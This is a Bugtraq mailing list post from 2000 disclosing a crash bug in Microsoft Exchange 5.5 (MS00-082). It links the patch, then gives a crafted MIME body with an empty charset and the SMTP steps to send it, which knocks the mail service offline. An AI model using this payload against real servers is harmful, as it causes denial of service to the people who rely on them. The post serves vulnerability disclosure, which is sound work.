Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Exploit scenario: Microsoft Security Bulletin (MS00-082)

From: Art Savelev <asavelev () ENI-NET COM>
Date: Fri, 10 Nov 2000 15:49:51 -0500
The following body of the e-mail message causes Microsoft Exchange 5.5
SP3 Internet Mail Service and Information Store to crash
Refer to Microsoft Security Bulletin (MS00-082)
(http://www.microsoft.com/technet/security/bulletin/ms00-082.asp).
Patch is available here:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25443.

The source of the problem is charset = ""

Body:

MIME-Version: 1.0

Content-Type: multipart/alternative;

     boundary="=_ Boundary 1-KTwEv4jY84Hk"

--=_ Boundary 1-KTwEv4jY84Hk

Content-Type: text/plain;

        charset = ""

Content-Transfer-Encoding: 7bit

This message is test

--=_ Boundary 1-KTwEv4jY84Hk--

Scenario:
1) Connect to 25th port of server (SMTP)
2) Enter (paste) following text:

HELO

MAIL FROM: myself () myserver com

RCPT TO: administrator

DATA

3) Now paste the body I gave
4) Type <CRLF>.<CRLF> (that is Enter-dot-Enter)
5) Type quit
6) Wait a little, and try to connect to 25th port again to verify - it
shouldn't work.

--
Art Savelev
http://www.savelev.com
Previous By Date Next
Previous By Thread Next

Current thread: